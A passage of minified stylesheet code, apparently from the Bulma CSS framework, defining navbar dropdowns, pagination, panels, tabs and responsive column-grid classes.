.navbar-dropdown,.navbar-item.is-hoverable:focus-within .navbar-dropdown.is-boxed,.navbar.is-spaced .navbar-item.is-hoverable:hover .navbar-dropdown,.navbar-item.is-hoverable:hover .navbar-dropdown.is-boxed{opacity:1;pointer-events:auto;transform:translateY(0)}.navbar-menu{flex-grow:1;flex-shrink:0}.navbar-start{justify-content:flex-start;margin-right:auto}.navbar-end{justify-content:flex-end;margin-left:auto}.navbar-dropdown{background-color:#fff;border-bottom-left-radius:6px;border-bottom-right-radius:6px;border-top:2px solid #dbdbdb;box-shadow:0 8px 8px #0a0a0a1a;display:none;font-size:.875rem;left:0;min-width:100%;position:absolute;top:100%;z-index:20}.navbar-dropdown .navbar-item{padding:.375rem 1rem;white-space:nowrap}.navbar-dropdown a.navbar-item{padding-right:3rem}.navbar-dropdown a.navbar-item:focus,.navbar-dropdown a.navbar-item:hover{background-color:#f5f5f5;color:#0a0a0a}.navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:#485fc7}.navbar.is-spaced .navbar-dropdown,.navbar-dropdown.is-boxed{border-radius:6px;border-top:none;box-shadow:0 8px 8px #0a0a0a1a,0 0 0 1px #0a0a0a1a;display:block;opacity:0;pointer-events:none;top:calc(100% - 4px);transform:translateY(-5px);transition-duration:86ms;transition-property:opacity,transform}.navbar-dropdown.is-right{left:auto;right:0}.navbar-divider{display:block}.navbar>.container .navbar-brand,.container>.navbar .navbar-brand{margin-left:-.75rem}.navbar>.container .navbar-menu,.container>.navbar .navbar-menu{margin-right:-.75rem}.navbar.is-fixed-bottom-desktop,.navbar.is-fixed-top-desktop{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom-desktop{bottom:0}.navbar.is-fixed-bottom-desktop.has-shadow{box-shadow:0 -2px 3px #0a0a0a1a}.navbar.is-fixed-top-desktop{top:0}html.has-navbar-fixed-top-desktop,body.has-navbar-fixed-top-desktop{padding-top:3.25rem}html.has-navbar-fixed-bottom-desktop,body.has-navbar-fixed-bottom-desktop{padding-bottom:3.25rem}html.has-spaced-navbar-fixed-top,body.has-spaced-navbar-fixed-top{padding-top:5.25rem}html.has-spaced-navbar-fixed-bottom,body.has-spaced-navbar-fixed-bottom{padding-bottom:5.25rem}a.navbar-item.is-active,.navbar-link.is-active{color:#0a0a0a}a.navbar-item.is-active:not(:focus):not(:hover),.navbar-link.is-active:not(:focus):not(:hover){background-color:transparent}.navbar-item.has-dropdown:focus .navbar-link,.navbar-item.has-dropdown:hover .navbar-link,.navbar-item.has-dropdown.is-active .navbar-link{background-color:#fafafa}}.hero.is-fullheight-with-navbar{min-height:calc(100vh - 3.25rem)}.pagination{font-size:1rem;margin:-.25rem}.pagination.is-small{font-size:.75rem}.pagination.is-medium{font-size:1.25rem}.pagination.is-large{font-size:1.5rem}.pagination.is-rounded .pagination-previous,.pagination.is-rounded .pagination-next{padding-left:1em;padding-right:1em;border-radius:9999px}.pagination.is-rounded .pagination-link{border-radius:9999px}.pagination,.pagination-list{align-items:center;display:flex;justify-content:center;text-align:center}.pagination-previous,.pagination-next,.pagination-link,.pagination-ellipsis{font-size:1em;justify-content:center;margin:.25rem;padding-left:.5em;padding-right:.5em;text-align:center}.pagination-previous,.pagination-next,.pagination-link{border-color:#dbdbdb;color:#363636;min-width:2.5em}.pagination-previous:hover,.pagination-next:hover,.pagination-link:hover{border-color:#b5b5b5;color:#363636}.pagination-previous:focus,.pagination-next:focus,.pagination-link:focus{border-color:#485fc7}.pagination-previous:active,.pagination-next:active,.pagination-link:active{box-shadow:inset 0 1px 2px #0a0a0a33}.pagination-previous[disabled],.pagination-previous.is-disabled,.pagination-next[disabled],.pagination-next.is-disabled,.pagination-link[disabled],.pagination-link.is-disabled{background-color:#dbdbdb;border-color:#dbdbdb;box-shadow:none;color:#7a7a7a;opacity:.5}.pagination-previous,.pagination-next{padding-left:.75em;padding-right:.75em;white-space:nowrap}.pagination-link.is-current{background-color:#485fc7;border-color:#485fc7;color:#fff}.pagination-ellipsis{color:#b5b5b5;pointer-events:none}.pagination-list{flex-wrap:wrap}.pagination-list li{list-style:none}@media screen and (max-width: 768px){.pagination{flex-wrap:wrap}.pagination-previous,.pagination-next,.pagination-list li{flex-grow:1;flex-shrink:1}}@media screen and (min-width: 769px),print{.pagination-list{flex-grow:1;flex-shrink:1;justify-content:flex-start;order:1}.pagination-previous,.pagination-next,.pagination-link,.pagination-ellipsis{margin-bottom:0;margin-top:0}.pagination-previous{order:2}.pagination-next{order:3}.pagination{justify-content:space-between;margin-bottom:0;margin-top:0}.pagination.is-centered .pagination-previous{order:1}.pagination.is-centered .pagination-list{justify-content:center;order:2}.pagination.is-centered .pagination-next{order:3}.pagination.is-right .pagination-previous{order:1}.pagination.is-right .pagination-next{order:2}.pagination.is-right .pagination-list{justify-content:flex-end;order:3}}.panel{border-radius:6px;box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #0a0a0a05;font-size:1rem}.panel:not(:last-child){margin-bottom:1.5rem}.panel.is-white .panel-heading{background-color:#fff;color:#0a0a0a}.panel.is-white .panel-tabs a.is-active{border-bottom-color:#fff}.panel.is-white .panel-block.is-active .panel-icon{color:#fff}.panel.is-black .panel-heading{background-color:#0a0a0a;color:#fff}.panel.is-black .panel-tabs a.is-active{border-bottom-color:#0a0a0a}.panel.is-black .panel-block.is-active .panel-icon{color:#0a0a0a}.panel.is-light .panel-heading{background-color:#f5f5f5;color:#000000b3}.panel.is-light .panel-tabs a.is-active{border-bottom-color:#f5f5f5}.panel.is-light .panel-block.is-active .panel-icon{color:#f5f5f5}.panel.is-dark .panel-heading{background-color:#363636;color:#fff}.panel.is-dark .panel-tabs a.is-active{border-bottom-color:#363636}.panel.is-dark .panel-block.is-active .panel-icon{color:#363636}.panel.is-primary .panel-heading{background-color:#00d1b2;color:#fff}.panel.is-primary .panel-tabs a.is-active{border-bottom-color:#00d1b2}.panel.is-primary .panel-block.is-active .panel-icon{color:#00d1b2}.panel.is-link .panel-heading{background-color:#485fc7;color:#fff}.panel.is-link .panel-tabs a.is-active{border-bottom-color:#485fc7}.panel.is-link .panel-block.is-active .panel-icon{color:#485fc7}.panel.is-info .panel-heading{background-color:#3e8ed0;color:#fff}.panel.is-info .panel-tabs a.is-active{border-bottom-color:#3e8ed0}.panel.is-info .panel-block.is-active .panel-icon{color:#3e8ed0}.panel.is-success .panel-heading{background-color:#48c78e;color:#fff}.panel.is-success .panel-tabs a.is-active{border-bottom-color:#48c78e}.panel.is-success .panel-block.is-active .panel-icon{color:#48c78e}.panel.is-warning .panel-heading{background-color:#ffe08a;color:#000000b3}.panel.is-warning .panel-tabs a.is-active{border-bottom-color:#ffe08a}.panel.is-warning .panel-block.is-active .panel-icon{color:#ffe08a}.panel.is-danger .panel-heading{background-color:#f14668;color:#fff}.panel.is-danger .panel-tabs a.is-active{border-bottom-color:#f14668}.panel.is-danger .panel-block.is-active .panel-icon{color:#f14668}.panel-tabs:not(:last-child),.panel-block:not(:last-child){border-bottom:1px solid #ededed}.panel-heading{background-color:#ededed;border-radius:6px 6px 0 0;color:#363636;font-size:1.25em;font-weight:700;line-height:1.25;padding:.75em 1em}.panel-tabs{align-items:flex-end;display:flex;font-size:.875em;justify-content:center}.panel-tabs a{border-bottom:1px solid #dbdbdb;margin-bottom:-1px;padding:.5em}.panel-tabs a.is-active{border-bottom-color:#4a4a4a;color:#363636}.panel-list a{color:#4a4a4a}.panel-list a:hover{color:#485fc7}.panel-block{align-items:center;color:#363636;display:flex;justify-content:flex-start;padding:.5em .75em}.panel-block input[type=checkbox]{margin-right:.75em}.panel-block>.control{flex-grow:1;flex-shrink:1;width:100%}.panel-block.is-wrapped{flex-wrap:wrap}.panel-block.is-active{border-left-color:#485fc7;color:#363636}.panel-block.is-active .panel-icon{color:#485fc7}.panel-block:last-child{border-bottom-left-radius:6px;border-bottom-right-radius:6px}a.panel-block,label.panel-block{cursor:pointer}a.panel-block:hover,label.panel-block:hover{background-color:#f5f5f5}.panel-icon{display:inline-block;font-size:14px;height:1em;line-height:1em;text-align:center;vertical-align:top;width:1em;color:#7a7a7a;margin-right:.75em}.panel-icon .fa{font-size:inherit;line-height:inherit}.tabs{-webkit-overflow-scrolling:touch;align-items:stretch;display:flex;font-size:1rem;justify-content:space-between;overflow:hidden;overflow-x:auto;white-space:nowrap}.tabs a{align-items:center;border-bottom-color:#dbdbdb;border-bottom-style:solid;border-bottom-width:1px;color:#4a4a4a;display:flex;justify-content:center;margin-bottom:-1px;padding:.5em 1em;vertical-align:top}.tabs a:hover{border-bottom-color:#363636;color:#363636}.tabs li{display:block}.tabs li.is-active a{border-bottom-color:#485fc7;color:#485fc7}.tabs ul{align-items:center;border-bottom-color:#dbdbdb;border-bottom-style:solid;border-bottom-width:1px;display:flex;flex-grow:1;flex-shrink:0;justify-content:flex-start}.tabs ul.is-left{padding-right:.75em}.tabs ul.is-center{flex:none;justify-content:center;padding-left:.75em;padding-right:.75em}.tabs ul.is-right{justify-content:flex-end;padding-left:.75em}.tabs .icon:first-child{margin-right:.5em}.tabs .icon:last-child{margin-left:.5em}.tabs.is-centered ul{justify-content:center}.tabs.is-right ul{justify-content:flex-end}.tabs.is-boxed a{border:1px solid transparent;border-radius:4px 4px 0 0}.tabs.is-boxed a:hover{background-color:#f5f5f5;border-bottom-color:#dbdbdb}.tabs.is-boxed li.is-active a{background-color:#fff;border-color:#dbdbdb;border-bottom-color:transparent!important}.tabs.is-fullwidth li{flex-grow:1;flex-shrink:0}.tabs.is-toggle a{border-color:#dbdbdb;border-style:solid;border-width:1px;margin-bottom:0;position:relative}.tabs.is-toggle a:hover{background-color:#f5f5f5;border-color:#b5b5b5;z-index:2}.tabs.is-toggle li+li{margin-left:-1px}.tabs.is-toggle li:first-child a{border-top-left-radius:4px;border-bottom-left-radius:4px}.tabs.is-toggle li:last-child a{border-top-right-radius:4px;border-bottom-right-radius:4px}.tabs.is-toggle li.is-active a{background-color:#485fc7;border-color:#485fc7;color:#fff;z-index:1}.tabs.is-toggle ul{border-bottom:none}.tabs.is-toggle.is-toggle-rounded li:first-child a{border-bottom-left-radius:9999px;border-top-left-radius:9999px;padding-left:1.25em}.tabs.is-toggle.is-toggle-rounded li:last-child a{border-bottom-right-radius:9999px;border-top-right-radius:9999px;padding-right:1.25em}.tabs.is-small{font-size:.75rem}.tabs.is-medium{font-size:1.25rem}.tabs.is-large{font-size:1.5rem}.column{display:block;flex-basis:0;flex-grow:1;flex-shrink:1;padding:.75rem}.columns.is-mobile>.column.is-narrow{flex:none;width:unset}.columns.is-mobile>.column.is-full{flex:none;width:100%}.columns.is-mobile>.column.is-three-quarters{flex:none;width:75%}.columns.is-mobile>.column.is-two-thirds{flex:none;width:66.6666%}.columns.is-mobile>.column.is-half{flex:none;width:50%}.columns.is-mobile>.column.is-one-third{flex:none;width:33.3333%}.columns.is-mobile>.column.is-one-quarter{flex:none;width:25%}.columns.is-mobile>.column.is-one-fifth{flex:none;width:20%}.columns.is-mobile>.column.is-two-fifths{flex:none;width:40%}.columns.is-mobile>.column.is-three-fifths{flex:none;width:60%}.columns.is-mobile>.column.is-four-fifths{flex:none;width:80%}.columns.is-mobile>.column.is-offset-three-quarters{margin-left:75%}.columns.is-mobile>.column.is-offset-two-thirds{margin-left:66.6666%}.columns.is-mobile>.column.is-offset-half{margin-left:50%}.columns.is-mobile>.column.is-offset-one-third{margin-left:33.3333%}.columns.is-mobile>.column.is-offset-one-quarter{margin-left:25%}.columns.is-mobile>.column.is-offset-one-fifth{margin-left:20%}.columns.is-mobile>.column.is-offset-two-fifths{margin-left:40%}.columns.is-mobile>.column.is-offset-three-fifths{margin-left:60%}.columns.is-mobile>.column.is-offset-four-fifths{margin-left:80%}.columns.is-mobile>.column.is-0{flex:none;width:0%}.columns.is-mobile>.column.is-offset-0{margin-left:0%}.columns.is-mobile>.column.is-1{flex:none;width:8.33333%}.columns.is-mobile>.column.is-offset-1{margin-left:8.33333%}.columns.is-mobile>.column.is-2{flex:none;width:16.66667%}.columns.is-mobile>.column.is-offset-2{margin-left:16.66667%}.columns.is-mobile>.column.is-3{flex:none;width:25%}.columns.is-mobile>.column.is-offset-3{margin-left:25%}.columns.is-mobile>.column.is-4{flex:none;width:33.33333%}.columns.is-mobile>.column.is-offset-4{margin-left:33.33333%}.columns.is-mobile>.column.is-5{flex:none;width:41.66667%}.columns.is-mobile>.column.is-offset-5{margin-left:41.66667%}.columns.is-mobile>.column.is-6{flex:none;width:50%}.columns.is-mobile>.column.is-offset-6{margin-left:50%}.columns.is-mobile>.column.is-7{flex:none;width:58.33333%}.columns.is-mobile>.column.is-offset-7{margin-left:58.33333%}.columns.is-mobile>.column.is-8{flex:none;width:66.66667%}.columns.is-mobile>.column.is-offset-8{margin-left:66.66667%}.columns.is-mobile>.column.is-9{flex:none;width:75%}.columns.is-mobile>.column.is-offset-9{margin-left:75%}.columns.is-mobile>.column.is-10{flex:none;width:83.33333%}.columns.is-mobile>.column.is-offset-10{margin-left:83.33333%}.columns.is-mobile>.column.is-11{flex:none;width:91.66667%}.columns.is-mobile>.column.is-offset-11{margin-left:91.66667%}.columns.is-mobile>.column.is-12{flex:none;width:100%}.columns.is-mobile>.column.is-offset-12{margin-left:100%}@media screen and (max-width: 768px){.column.is-narrow-mobile{flex:none;width:unset}.column.is-full-mobile{flex:none;width:100%}.column.is-three-quarters-mobile{flex:none;width:75%}.column.is-two-thirds-mobile{flex:none;width:66.6666%}.column.is-half-mobile{flex:none;width:50%}.column.is-one-third-mobile{flex:none;width:33.3333%}.column.is-one-quarter-mobile{flex:none;width:25%}.column.is-one-fifth-mobile{flex:none;width:20%}.column.is-two-fifths-mobile{flex:none;width:40%}.column.is-three-fifths-mobile{flex:none;width:60%}.column.is-four-fifths-mobile{flex:none;width:80%}.column.is-offset-three-quarters-mobile{margin-left:75%}.column.is-offset-two-thirds-mobile{margin-left:66.6666%}.column.is-offset-half-mobile{margin-left:50%}.column.is-offset-one-third-mobile{margin-left:33.3333%}.column.is-offset-one-quarter-mobile{margin-left:25%}.column.is-offset-one-fifth-mobile{margin-left:20%}.column.is-offset-two-fifths-mobile{margin-left:40%}.column.is-offset-three-fifths-mobile{margin-left:60%}.column.is-offset-four-fifths-mobile{margin-left:80%}.column.is-0-mobile{flex:none;width:0%}.column.is-offset-0-mobile{margin-left:0%}.column.is-1-mobile{flex:none;width:8.33333%}.column.is-offset-1-mobile{margin-left:8.33333%}.column.is-2-mobile{flex:none;width:16.66667%}.column.is-offset-2-mobile{margin-left:16.66667%}.column.is-3-mobile{flex:none;width:25%}.column.is-offset-3-mobile{margin-left:25%}.column.is-4-mobile{flex:none;width:33.33333%}.column.is-offset-4-mobile{margin-left:33.33333%}.column.is-5-mobile{flex:none;width:41.66667%}.column.is-offset-5-mobile{margin-left:41.66667%}.column.is-6-mobile{flex:none;width:50%}.column.is-offset-6-mobile{margin-left:50%}.column.is-7-mobile{flex:none;width:58.33333%}.column.is-offset-7-mobile{margin-left:58.33333%}.column.is-8-mobile{flex:none;width:66.66667%}.column.is-offset-8-mobile{margin-left:66.66667%}.column.is-9-mobile{flex:none;width:75%}.column.is-offset-9-mobile{margin-left:75%}.column.is-10-mobile{flex:none;width:83.33333%}.column.is-offset-10-mobile{margin-left:83.33333%}.column.is-11-mobile{flex:none;width:91.66667%}.column.is-offset-11-mobile{margin-left:91.66667%}.column.is-12-mobile{flex:none;width:100%}.column.is-offset-12-mobile{margin-left:100%}}@media screen and (min-width: 769px),print{.column.is-narrow,.column.is-narrow-tablet{flex:none;width:unset}.column.is-full,.column.is-full-tablet{flex:none;width:100%}.column.is-three-quarters,.column.is-three-quarters-tablet{flex:none;width:75%}.column.is-two-thirds,.column.is-two-thirds-tablet{flex:none;width:66.6666%}.column.is-half,.column.is-half-tablet{flex:none;width:50%}.column.is-one-third,.column.is-one-third-tablet{flex:none;width:33.3333%}.column.is-one-quarter,.column.is-one-quarter-tablet{flex:none;width:25%}.column.is-one-fifth,.column.is-one-fifth-tablet{flex:none;width:20%}.column.is-two-fifths,.column.is-two-fifths-tablet{flex:none;width:40%}.column.is-three-fifths,.column.is-three-fifths-tablet{flex:none;width:60%}.column.is-four-fifths,.column.is-four-fifths-tablet{flex:none;width:80%}.column.is-offset-three-quarters,.column.is-offset-three-quarters-tablet{margin-left:75%}.column.is-offset-two-thirds,.column.is-offset-two-thirds-tablet{margin-left:66.6666%}.column.is-offset-half,.column.is-offset-half-tablet{margin-left:50%}.column.is-offset-one-third,.column.is-offset-one-third-tablet{margin-left:33.3333%}.column.is-offset-one-quarter,.column.is-offset-one-quarter-tablet{margin-left:25%}.column.is-offset-one-fifth,.column.is-offset-one-fifth-tablet{margin-left:20%}.column.is-offset-two-fifths,.column.is-offset-two-fifths-tablet{margin-left:40%}.column.is-offset-three-fifths,.column.is-offset-three-fifths-tablet{margin-left:60%}.column.is-offset-four-fifths,.column.is-offset-four-fifths-tablet{margin-left:80%}.column.is-0,.column.is-0-tablet{flex:none;width:0%}.column.is-offset-0,.column.is-offset-0-tablet{margin-left:0%}.column.is-1,.column.is-1-tablet{flex:none;width:8.33333%}.column.is-offset-1,.column.is-offset-1-tablet{margin-left:8.33333%}.column.is-2,.column.is-2-tablet{flex:none;width:16.66667%}.column.is-offset-2,.column.is-offset-2-tablet{margin-left:16.66667%}.column.is-3,.column.is-3-tablet{flex:none;width:25%}.column.is-offset-3,.column.is-offset-3-tablet{margin-left:25%}.column.is-4,.column.is-4-tablet{flex:none;width:33.33333%}.column.is-offset-4,.column.is-offset-4-tablet{margin-left:33.33333%}.column.is-5,.column.is-5-tablet{flex:none;width:41.66667%}.column.is-offset-5,.column.is-offset-5-tablet{margin-left:41.66667%}.column.is-6,.column.is-6-tablet{flex:none;width:50%}.column.is-offset-6,.column.is-offset-6-tablet{margin-left:50%}.column.is-7,.column.is-7-tablet{flex:none;width:58.33333%}.column.is-offset-7,.column.is-offset-7-tablet{margin-left:58.33333%}.column.is-8,.column.is-8-tablet{flex:none;width:66.66667%}.column.is-offset-8,.column.is-offset-8-tablet{margin-left:66.66667%}.column.is-9,.column.is-9-tablet{flex:none;width:75%}.column.is-offset-9,.column.is-offset-9-tablet{margin-left:75%}.column.is-10,.column.is-10-tablet{flex:none;width:83.33333%}.column.is-offset-10,.column.is-offset-10-tablet{margin-left:83.33333%}.column.is-11,.column.is-11-tablet{flex:none;width:91.66667%}.column.is-offset-11,.column.is-offset-11-tablet{margin-left:91.66667%}.column.is-12,.column.is-12-tablet{flex:none;width:100%}.column.is-offset-12,.column.is-offset-12-tablet{margin-left:100%}}@media screen and (max-width: 1023px){.column.is-narrow-touch{flex:none;width:unset}.column.is-full-touch{flex:none;width:100%}.column.is-three-quarters-touch{flex:none;width:75%}.column.is-two-thirds-touch{flex:none;width:66.6666%}.column.is-half-touch{flex:none;width:50%}.column.is-one-third-touch{flex:none;width:33.3333%}.column.is-one-quarter-touch{flex:none;width:25%}.column.is-one-fifth-touch{flex:none;width:20%}.column.is-two-fifths-touch{flex:none;width:40%}.column.is-three-fifths-touch{flex:none;width:60%}.column.is-four-fifths-touch{flex:none;width:80%}.column.is-offset-three-quarters-touch{margin-left:75%}.column.is-offset-two-thirds-touch{margin-left:66.6666%}.column.is-offset-half-touch{margin-left:50%}.column.is-offset-one-third-touch{margin-left:33.3333%}.column.is-offset-one-quarter-touch{margin-left:25%}.column.is-offset-one-fifth-touch{margin-left:20%}.column.is-offset-two-fifths-touch{margin-left:40%}.column.is-offset-three-fifths-touch{margin-left:60%}.column.is-offset-four-fifths-touch{margin-left:80%}.column.is-0-touch{flex:none;width:0%}.column.is-offset-0-touch{margin-left:0%}.column.is-1-touch{flex:none;width:8.33333%}.column.is-offset-1-touch{margin-left:8.33333%}.column.is-2-touch{flex:none;width:16.66667%}.column.is-offset-2-touch{margin-left:16.66667%}.column.is-3-touch{flex:none;width:25%}.column.is-offset-3-touch{margin-left:25%}.column.is-4-touch{flex:none;width:33.33333%}.column.is-offset-4-touch{margin-left:33.33333%}.column.is-5-touch{flex:none;width:41.66667%}.column.is-offset-5-touch{margin-left:41.66667%}.column.is-6-touch{flex:none;width:50%}.column.is-offset-6-touch{margin-left:50%}.column.is-7-touch{flex:none;width:58.33333%}.column.is-offset-7-touch{margin-left:58.33333%}.column.is-8-touch{flex:none;width:66.66667%}.column.is-offset-8-touch{margin-left:66.66667%}.column.is-9-touch{flex:none;width:75%}.column.is-offset-9-touch{margin-left:75%}.column.is-10-touch{flex:none;width:83.33333%}.column.is-offset-10-touch{margin-left:83.33333%}.column.is-11-touch{flex:none;width:91.66667%}.column.is-offset-11-touch{margin-left:91.66667%}.column.is-12-touch{flex:none;width:100%}.column.is-offset-12-touch{margin-left:100%}}@media screen and (min-width: 1024px){.column.is-narrow-desktop{flex:none;width:unset}.column.is-full-desktop{flex:none;width:100%}.column.is-three-quarters-desktop{flex:none;width:75%}.column.is-two-thirds-desktop{flex:none;width:66.6666%}.column.is-half-desktop{flex:none;width:50%}.column.is-one-third-desktop{flex:none;width:33.3333%}.column.is-one-quarter-desktop{flex:none;width:25%}.column.is-one-fifth-desktop{flex:none;width:20%}.column.is-two-fifths-desktop{flex:none;width:40%}.column.is-three-fifths-desktop{flex:none;width:60%}.column.is-four-fifths-desktop{flex:none;width:80%}.column.is-offset-three-quarters-desktop{margin-left:75%}.column.is-offset-two-thirds-desktop{margin-left:66.6666%}.column.is-offset-half-desktop{margin-left:50%}.column.is-offset-one-third-desktop{margin-left:33.3333%}.column.is-offset-one-quarter-desktop{margin-left:25%}.column.is-offset-one-fifth-desktop{margin-left:20%}.column.is-offset-two-fifths-desktop{margin-left:40%}.column.is-offset-three-fifths-desktop{margin-left:60%}.column.is-offset-four-fifths-desktop{margin-left:80%}.column.is-0-desktop{flex:none;width:0%}.column.is-offset-0-desktop{margin-left:0%}.column.is-1-desktop{flex:none;width:8.33333%}.column.is-offset-1-desktop{margin-left:8.33333%}.column.is-2-desktop{flex:none;width:16.66667%}.column.is-offset-2-desktop{margin-left:16.66667%}.column.is-3-desktop{flex:none;width:25%}.column.is-offset-3-desktop{margin-left:25%}.column.is-4-desktop{flex:none;width:33.33333%}.column.is-offset-4-desktop{margin-left:33.33333%}.column.is-5-desktop{flex:none;width:41.66667%}.column.is-offset-5-desktop{margin-left:41.66667%}.column.is-6-desktop{flex:none;width:50%}.column.is-offset-6-desktop{margin-left:50%}.column.is-7-desktop{flex:none;width:58.33333%}.column.is-offset-7-desktop{margin-left:58.33333%}.column.is-8-desktop{flex:none;width:66.66667%}.column.is-offset-8-desktop{margin-left:66.66667%}.column.is-9-desktop{flex:none;width:75%}.column.is-offset-9-desktop{margin-left:75%}.column.is-10-desktop{flex:none;width:83.33333%}.column.is-offset-10-desktop{margin-left:83.33333%}.column.is-11-desktop{flex:none;width:91.66667%}.column.is-offset-11-desktop{margin-left:91.66667%}.column.is-12-desktop{flex:none;width:100%}.column.is-offset-12-desktop{margin-left:100%}}@media screen and (min-width: 1216px){.column.is-narrow-widescreen{flex:none;width:unset}.column.is-full-widescreen{flex:none;width:100%}.column.is-three-quarters-widescreen{flex:none;width:75%}.column.is-two-thirds-widescreen{flex:none;width:66.6666%}.column.is-half-widescreen{flex:none;width:50%}.column.is-one-third-widescreen{flex:none;width:33.3333%}.column.is-one-quarter-widescreen{flex:none;width:25%}.column.is-one-fifth-widescreen{flex:none;width:20%}.column.is-two-fifths-widescreen{flex:none;width:40%}.column.is-three-fifths-widescreen{flex:none;width:60%}.column.is-four-fifths-widescreen{flex:none;width:80%}.column.is-offset-three-quarters-widescreen{margin-left:75%}.column.is-offset-two-thirds-widescreen{margin-left:66.6666%}.column.is-offset-half-widescreen{margin-left:50%}.column.is-offset-one-third-widescreen{margin-left:33.3333%}.column.is-offset-one-quarter-widescreen{margin-left:25%}.column.is-offset-one-fifth-widescreen{margin-left:20%}.column.is-offset-two-fifths-widescreen{margin-left:40%}.column.is-offset-three-fifths-widescreen{margin-left:60%}.column.is-offset-four-fifths-widescreen{margin-left:80%}.column.is-0-widescreen{flex:none;width:0%}.column.is-offset-0-widescreen{margin-left:0%}.column.is-1-widescreen{flex:none;width:8.33333%}.column.is-offset-1-widescreen{margin-left:8.33333%}.column.is-2-widescreen{flex:none;width:16.66667%}.column.is-offset-2-widescreen{margin-left:16.66667%}.column.is-3-widescreen{flex:none;width:25%}.column.is-offset-3-widescreen{margin-left:25%}.column.is-4-widescreen{flex:none;width:33.33333%}.column.is-offset-4-widescreen{margin-left:33.33333%}.column.is-5-widescreen{flex:none;width:41.66667%}.column.is-offset-5-widescreen{margin-left:41.66667%}.column.is-6-widescreen{flex:none;width:50%}.column.is-offset-6-widescreen{margin-left:50%}.column.is-7-widescreen{flex:none;width:58.33333%}.column.is-offset-7-widescreen{margin-left:58.33333%}.column.is-8-widescreen{flex:none;width:66.66667%}.column.is-offset-8-widescreen{margin-left:66.66667%}.column.is-9-widescreen{flex:none;width:75%}.column.is-offset-9-widescreen{margin-left:75%}.column.is-10-widescreen{flex:none;width:83.33333%}.column.is-offset-10-widescreen{margin-left:83.33333%}.column.is-11-widescreen{flex:none;width:91.66667%}.column.is-offset-11-widescreen{margin-left:91.66667%}.column.is-12-widescreen{flex:none;width:100%}.column.is-offset-12-widescreen{margin-left:100%}}@media screen and (min-width: 1408px){.column.is-narrow-fullhd{flex:none;width:unset}.column.is-full-fullhd{flex:none;width:100%}.column.is-three-quarters-fullhd{flex:none;width:75%}.column.is-two-thirds-fullhd{flex:none;width:66.6666%}.column.is-half-fullhd{flex:none;width:50%}.column.is-one-third-fullhd{flex:none;width:33.3333%}.column.is-one-quarter-fullhd{flex:none;width:25%}.column.is-one-fifth-fullhd{flex:none;width:20%}.column.is-two-fifths-fullhd{flex:none;width:40%}.column.is-three-fifths-fullhd{flex:none;width:60%}.column.is-four-fifths-fullhd{flex:none;width:80%}.column.is-offset-three-quarters-fullhd{margin-left:75%}.column.is-offset-two-thirds-fullhd{margin-left:66.6666%}.column.is-offset-half-fullhd{margin-left:50%}.column.is-offset-one-third-fullhd{margin-left:33.3333%}.column.is-offset-one-quarter-fullhd{margin-left:25%}.column.is-offset-one-fifth-fullhd{margin-left:20%}.column.is-offset-two-fifths-fullhd{margin-left:40%}.column.is-offset-three-fifths-fullhd{margin-left:60%}.column.is-offset-four-fifths-fullhd{margin-left:80%}.column.is-0-fullhd{flex:none;width:0%}.column.is-offset-0-fullhd{margin-left:0%}.column.is-1-fullhd{flex:none;width:8.33333%}.column.is-offset-1-fullhd{margin-left:8.33333%}.column.is-2-fullhd{flex:none;width:16.66667%}.column.is-offset-2-fullhd{margin-left:16.66667%}.column.is-3-fullhd{flex:none;width:25%}.column.is-offset-3-fullhd{margin-left:25%}.column.is-4-fullhd{flex:none;width:33.33333%}.column.is-offset-4-fullhd{margin-left:33.33333%}.column.is-5-fullhd{flex:none;width:41.66667%}.column.is-offset-5-fullhd{margin-left:41.66667%}.column.is-6-fullhd{flex:none;width:50%}.column.is-offset-6-fullhd{margin-left:50%}.column.is-7-fullhd{flex:none;width:58.33333%}.column.is-offset-7-fullhd{margin-left:58.33333%}.column.is-8-fullhd{flex:none;width:66.66667%}.column.is-offset-8-fullhd{margin-left:66.66667%}.column.is-9-fullhd{flex:none;width:75%}.column.is-offset-9-fullhd{margin-left:75%}.column.is-10-fullhd{flex:none;width:83.33333%}.column.is-offset-10-fullhd{margin-left:83.33333%}.column.is-11-fullhd{flex:none;width:91.66667%}.column.is-offset-11-fullhd{margin-left:91.66667%}.column.is-12-fullhd{flex:none;width:100%}.column.is-offset-12-fullhd{margin-left:100%}}.columns{margin-left:-.75rem;margin-right:-.75rem;margin-top:-.75rem}.columns:last-child{margin-bottom:-.75rem}.columns:not(:last-child){margin-bottom:.75rem}.columns.is-centered{justify-content:center}.columns.is-gapless{margin-left:0;margin-right:0;margin-top:0}.columns.is-gapless>.column{margin:0;padding:0!important}.columns.is-gapless:not(:last-child){margin-bottom:1.5rem}.columns.is-gapless:last-child{margin-bottom:0}.columns.is-mobile{display:flex}.columns.is-multiline{flex-wrap:wrap}.columns.is-vcentered{align-items:center}@media screen and (min-width: 769px),print{.columns:not(.is-desktop){display:flex}}@media screen and (min-width: 1024px){.columns.is-desktop{display:flex}}.columns.is-variable{--columnGap: .75rem;margin-left:calc(-1 * var(--columnGap));margin-right:calc(-1 * var(--columnGap))}.columns.is-variable>.column{padding-left:var(--columnGap);padding-right:var(--columnGap)}.columns.is-variable.is-0{--columnGap: 0rem}@media screen and (max-width: 768px){.columns.is-variable.is-0-mobile{--columnGap: 0rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-0-tablet{--columnGap: 0rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-0-tablet-only{--columnGap: 0rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-0-touch{--columnGap: 0rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-0-desktop{--columnGap: 0rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-0-desktop-only{--columnGap: 0rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-0-widescreen{--columnGap: 0rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-0-widescreen-only{--columnGap: 0rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-0-fullhd{--columnGap: 0rem}}.columns.is-variable.is-1{--columnGap: .25rem}@media screen and (max-width: 768px){.columns.is-variable.is-1-mobile{--columnGap: .25rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-1-tablet{--columnGap: .25rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-1-tablet-only{--columnGap: .25rem}}@media screen and (max-width: 